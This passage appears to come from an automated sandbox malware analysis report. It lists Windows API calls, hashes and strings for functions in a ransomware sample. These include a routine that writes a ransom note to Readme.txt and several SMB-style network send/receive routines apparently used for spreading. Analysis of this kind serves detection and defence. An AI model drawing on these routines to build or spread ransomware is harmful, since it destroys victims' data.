                                                                        • Part of subcall function 04853680: HeapAlloc.KERNEL32(00000000,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048536CA
                                                                        • Part of subcall function 04853680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04854A6E,?,?,?,?,00000000,?), ref: 048537A2
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04854A96
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854A99
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                      • String ID:
                                                                      • API String ID: 3041643382-0
                                                                      • Opcode ID: 227f32905f65fa8b08c4b48b9d8331582cdced1c3146ce3987f2201e86953b9e
                                                                      • Instruction ID: dc05a8db4dc09ed80ec3f2bf4f34c721650f0c02c3c27978618f866c4e5ffe57
                                                                      • Opcode Fuzzy Hash: 227f32905f65fa8b08c4b48b9d8331582cdced1c3146ce3987f2201e86953b9e
                                                                      • Instruction Fuzzy Hash: A2C1DF7140034AEEDB10DFA4C804BAABBB5FF49744F008919FC85DB6A0E774E994DB61
                                                                      Function 048560F9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 113fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 04856118
                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 04856136
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04856170
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000000,00000000), ref: 04856191
                                                                      • memset.MSVCRT ref: 048561C8
                                                                      • StrCatW.SHLWAPI(?,Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f), ref: 048561E2
                                                                      • StrCatW.SHLWAPI(?,?), ref: 048561EE
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0485621B
                                                                      • FlushFileBuffers.KERNEL32(00000000), ref: 04856226
                                                                      • LocalFree.KERNEL32(?), ref: 0485622F
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 04856236
                                                                      Strings
                                                                      • Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f, xrefs: 048561D6
                                                                      • Readme.txt, xrefs: 04856107
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: File$BuffersCloseCombineCountCreateFlushFreeHandleLocalMultipleObjectsPathTickWaitWritememsetwsprintf
                                                                      • String ID: Oops! Your files have been encrypted.If you see this text, your files are no longer accessible.You might have been looking f$Readme.txt
                                                                      • API String ID: 1343258794-115798760
                                                                      • Opcode ID: 069bf18166637ab30e3c6faa2506b0cd72c6b975afc5fdb4910444de79246479
                                                                      • Instruction ID: 9cb2375b05f5cbd29d9428fe2acb0dbc36d4be4efb4310705b28b06b2b098678
                                                                      • Opcode Fuzzy Hash: 069bf18166637ab30e3c6faa2506b0cd72c6b975afc5fdb4910444de79246479
                                                                      • Instruction Fuzzy Hash: 16317376500208ABDB219B64ED48D9B7BFCEB49700B448A55FD0AD2050EB39FA44CBA0
                                                                      Function 04851EB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 161memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 04851ED2
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851EDB
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0485943A), ref: 04851F1F
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04851F22
                                                                      • htons.WS2_32(?), ref: 04851F41
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04851FF1
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852008
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 0485202B
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852032
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A), ref: 0485203D
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID: ?????
                                                                      • API String ID: 1780562090-2358547729
                                                                      • Opcode ID: c4f6748814f1f9c040f96318b976440514de91d2473c10368ed7be7504fe4ccc
                                                                      • Instruction ID: 58c335e8203dd4c2c8e0bb1fb5109180fce4a2eb66d8c6203701074bd09b05c8
                                                                      • Opcode Fuzzy Hash: c4f6748814f1f9c040f96318b976440514de91d2473c10368ed7be7504fe4ccc
                                                                      • Instruction Fuzzy Hash: E45108359003469FDB11CF68D848AAA7FF9EF49340B058A95FC84DB361DB35E809C750
                                                                      Function 04853071 Relevance: 21.1, APIs: 14, Instructions: 95memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,74DEF380,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 04853089
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853092
                                                                      • GetProcessHeap.KERNEL32(00000008,0000003F,74DEDF60,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 048530A4
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 048530A7
                                                                      • htons.WS2_32(0000003B), ref: 048530BF
                                                                      • send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 048530F7
                                                                      • recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 0485310D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853127
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485312E
                                                                      • memcpy.MSVCRT(00000000,0000002F,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853144
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853153
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485315A
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04853165
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,04854F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 0485316C
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 317911368-0
                                                                      • Opcode ID: 1d8fcc78d6420df5d02f51f3b1cd1a84c783ede3978352fe838ba1f534fd2c1d
                                                                      • Instruction ID: 2a84e082e861960c7a633ff982f674a4a650a128323c22ed9d80c9fdd518b6c9
                                                                      • Opcode Fuzzy Hash: 1d8fcc78d6420df5d02f51f3b1cd1a84c783ede3978352fe838ba1f534fd2c1d
                                                                      • Instruction Fuzzy Hash: 26318F71540305BBEB116FF4DC49F6A7BADEF88341F148859FD04DB290DA79A844CB25
                                                                      Function 0485892A Relevance: 19.6, APIs: 13, Instructions: 91threadmemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 04858944
                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 0485894B
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0485896D
                                                                      • GetLastError.KERNEL32 ref: 0485897E
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0485898F
                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 048589A8
                                                                      • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 048589BF
                                                                      • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 048589D2
                                                                      • GetLastError.KERNEL32 ref: 048589FD
                                                                      • GlobalFree.KERNEL32(00000000), ref: 04858A00
                                                                      • GetLastError.KERNEL32 ref: 04858A08
                                                                      • CloseHandle.KERNEL32(?), ref: 04858A0F
                                                                      • GetLastError.KERNEL32 ref: 04858A17
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1283781744-0
                                                                      • Opcode ID: 4d3a4b677e5937346386efb8a178f0117b5e4594bd9d0c4bb26a691903a72402
                                                                      • Instruction ID: 4a12e5d844387762f342d3a8a8dac373dff615559bf8e4339e01c5826c83df33
                                                                      • Opcode Fuzzy Hash: 4d3a4b677e5937346386efb8a178f0117b5e4594bd9d0c4bb26a691903a72402
                                                                      • Instruction Fuzzy Hash: 23318135900205EFEB12AF61DC48B9DBFB8EF00740F104A52ED01E2060D739AD91DB66
                                                                      Function 04852F5A Relevance: 18.1, APIs: 12, Instructions: 98memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 04852F73
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852F7C
                                                                      • GetProcessHeap.KERNEL32(00000008,?,7598C650), ref: 04852F97
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04852F9A
                                                                      • htons.WS2_32(424D53FE), ref: 04852FBA
                                                                      • memcpy.MSVCRT(00000040,?,?), ref: 0485300B
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 0485301B
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04853032
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04853048
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485304F
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485305A
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853061
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2433318192-0
                                                                      • Opcode ID: c83219345e66c0102959e3d9c63134c54ba176f64936fa526237b6baf17e8eb8
                                                                      • Instruction ID: ec5e8d610332caa7daa13f33d6421efedd883c245a8076da7e8ce1789a4309b0
                                                                      • Opcode Fuzzy Hash: c83219345e66c0102959e3d9c63134c54ba176f64936fa526237b6baf17e8eb8
                                                                      • Instruction Fuzzy Hash: 7131AF75900345ABEF10AFA9D888A9A7BFCFF48340F058455FD08EB251E779D944CB25
                                                                      Function 048532AF Relevance: 18.1, APIs: 12, Instructions: 88memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,?), ref: 048532CB
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048532D4
                                                                      • GetProcessHeap.KERNEL32(00000008,?,74DEF380), ref: 048532EF
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 048532F2
                                                                      • htons.WS2_32(?), ref: 0485330F
                                                                      • memcpy.MSVCRT(0000004D,?,?), ref: 0485333D
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04853350
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04853368
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0485337B
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853382
                                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 0485338D
                                                                      • HeapFree.KERNEL32(00000000), ref: 04853394
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                      • String ID:
                                                                      • API String ID: 2433318192-0
                                                                      • Opcode ID: 5a192c88969dbbb40ddd30aadf923ff796c219a6d1e93a6028995114a790066b
                                                                      • Instruction ID: b9f637c068388adaa20d2c930f740085afad96a799f296168a79e43a94a252db
                                                                      • Opcode Fuzzy Hash: 5a192c88969dbbb40ddd30aadf923ff796c219a6d1e93a6028995114a790066b
                                                                      • Instruction Fuzzy Hash: CA317F7190030ABBEB009FA9AC45EAE7BACEF49351F048555FD00EB291DB78ED05CB60
                                                                      Function 04851DD1 Relevance: 18.1, APIs: 12, Instructions: 84memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851DE9
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851DF2
                                                                      • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E04
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E07
                                                                      • htons.WS2_32(00000027), ref: 04851E21
                                                                      • send.WS2_32(?,00000000,0000002B,00000000), ref: 04851E4A
                                                                      • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04851E63
                                                                      • memset.MSVCRT ref: 04851E81
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E90
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851E97
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851EA2
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048554D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04851EA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsmemsetrecvsend
                                                                      • String ID:
                                                                      • API String ID: 255267840-0
                                                                      • Opcode ID: c2d03953a84c7cefdeefb7b0c8457291a94bda40268f4d71c819fe1cae001b33
                                                                      • Instruction ID: 1d13caacd58b1b0eafa4325b0dac94b0e02d3864e853739ca495eee3cda56baa
                                                                      • Opcode Fuzzy Hash: c2d03953a84c7cefdeefb7b0c8457291a94bda40268f4d71c819fe1cae001b33
                                                                      • Instruction Fuzzy Hash: D0217E71A00305BBEB105FA99C49F6A7BACFF49750F048959BD04DB291DBB8E804C765
                                                                      Function 048541E9 Relevance: 16.7, APIs: 13, Instructions: 443memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74DEF380), ref: 048541FD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854204
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540F8
                                                                        • Part of subcall function 048540E3: HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048540FB
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 04854148
                                                                        • Part of subcall function 048540E3: HeapAlloc.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 0485414B
                                                                        • Part of subcall function 048540E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?,00000000), ref: 04854184
                                                                        • Part of subcall function 048540E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0485423E,?,?,?,0485423D,?,?,?,?,00000000), ref: 048541BC
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0485423D,?,?,?,?), ref: 048541CB
                                                                        • Part of subcall function 048540E3: HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541CE
                                                                        • Part of subcall function 048540E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541D7
                                                                        • Part of subcall function 048540E3: HeapFree.KERNEL32(00000000,?,?,?,0485423D,?,?,?,?,00000000,00000002), ref: 048541DA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04854287
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485428E
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 048542D9
                                                                      • HeapFree.KERNEL32(00000000), ref: 048542E0
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04854336
                                                                      • HeapFree.KERNEL32(00000000), ref: 0485433D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74DEF380,?,00000000,00000100,?), ref: 04854399
                                                                      • HeapFree.KERNEL32(00000000), ref: 048543A0
                                                                      • memset.MSVCRT ref: 048543AE
                                                                        • Part of subcall function 04853D0D: rand.MSVCRT ref: 04853EC3
                                                                        • Part of subcall function 04853D0D: memset.MSVCRT ref: 04853EFC
                                                                        • Part of subcall function 04853D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04853F38
                                                                        • Part of subcall function 04853D0D: htons.WS2_32(?), ref: 04853F5C
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 0485466C
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854673
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74DEF380,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?), ref: 04853D2B
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D34
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04853D46
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D49
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853D63
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853D66
                                                                        • Part of subcall function 04853D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04854269,?,00000000,?,?,?), ref: 04853E5B
                                                                        • Part of subcall function 04853D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04853E65
                                                                        • Part of subcall function 04853D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04854269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04853E68
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                      • String ID:
                                                                      • API String ID: 2891003447-0
                                                                      • Opcode ID: 135bab54603521e7e12bd8bbfecabf3c9e120eefa834f979855ac8fc5b60f929
                                                                      • Instruction ID: 72a722d7726f0a99b5eb5c96653122c300c42bac091f9b8da16fad67bc1678c7
                                                                      • Opcode Fuzzy Hash: 135bab54603521e7e12bd8bbfecabf3c9e120eefa834f979855ac8fc5b60f929
                                                                      • Instruction Fuzzy Hash: 41F19E719047059FEB11CF44C840BAABBF6EF49704F088959ED4AAB361C3B5FA59CB90
                                                                      Function 04852054 Relevance: 16.6, APIs: 11, Instructions: 110memorynetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,0485943A), ref: 0485206D
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852076
                                                                      • GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,0485943A), ref: 0485209C
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485209F
                                                                      • htons.WS2_32(?), ref: 048520BC
                                                                      • send.WS2_32(?,00000000,?,00000000), ref: 04852131
                                                                      • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04852148
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0485943A), ref: 04852168
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 0485216F
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0485943A), ref: 0485217A
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,?,0485943A), ref: 04852181
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                      • String ID:
                                                                      • API String ID: 1780562090-0
                                                                      • Opcode ID: 0e591c075ac6a42e245ca60fea4a7e766608afdccd06cafaeada824a0fef20be
                                                                      • Instruction ID: 232d1ce03c630722e8d772554fe00995e5a485d6c83b2c157f686e74c5c5a35e
                                                                      • Opcode Fuzzy Hash: 0e591c075ac6a42e245ca60fea4a7e766608afdccd06cafaeada824a0fef20be
                                                                      • Instruction Fuzzy Hash: 0041A07550034AABDF119FA8D888A9B7FF8EF49300F048598FD44DB291DB79E809CB60
                                                                      Function 04852E12 Relevance: 16.6, APIs: 11, Instructions: 109memorynetworkCOMMON
